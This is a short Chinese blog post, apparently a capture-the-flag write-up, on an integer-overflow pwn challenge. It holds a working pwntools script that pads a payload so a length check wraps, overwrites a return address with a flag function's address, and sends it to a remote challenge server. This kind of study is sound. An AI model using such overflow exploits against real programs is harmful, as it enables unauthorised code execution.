0
点赞
收藏
分享

微信扫一扫

[pwn] 10.整形溢出

哈哈镜6567 2022-06-17 阅读 143
web安全系统安全安全python编程语言


文章目录

  • ​​整形溢出原理​​
  • ​​pwn int_overflow​​

整形溢出原理

超过存储长度直接被丢弃
[pwn] 10.整形溢出_系统安全

pwn int_overflow

[pwn] 10.整形溢出_安全_02

[pwn] 10.整形溢出_安全_03

0x14+0x4+4字节返回地址+234(或者235等等,只要最后字符个数在3+256~8+256之间就可以)=262个字符,可以通过if

import pwn
flag_addr = 0x0804868B
payload = ('x'*(0x14+0x4)).encode() + \
pwn.p32(flag_addr) + ('x'*234).encode()

r = pwn.remote("220.249.52.133", 44711)
r.sendlineafter("Your choice:", "1")
r.sendlineafter("your username:", "a")
r.recvuntil("your passwd:")
r.sendline(payload)
r.interactive()

注意kali下用命令​​python3 a.py​


举报

相关推荐

PWN-整数溢出

安全系统安全

CTFshow-PWN-栈溢出(pwn36)

机器学习支持向量机

10. 网络

深度学习pythonpytorch

10.指针

c语言c++链表

10. 信号

unix

10.动态规划

动态规划算法贪心算法

10. v-for

vue.js

10. 订单管理

css3前端cssvue

10.多线程

java数据结构开发语言

10. HttpServletResponse接口

数据客户端htmlJava编程语言
0 条评论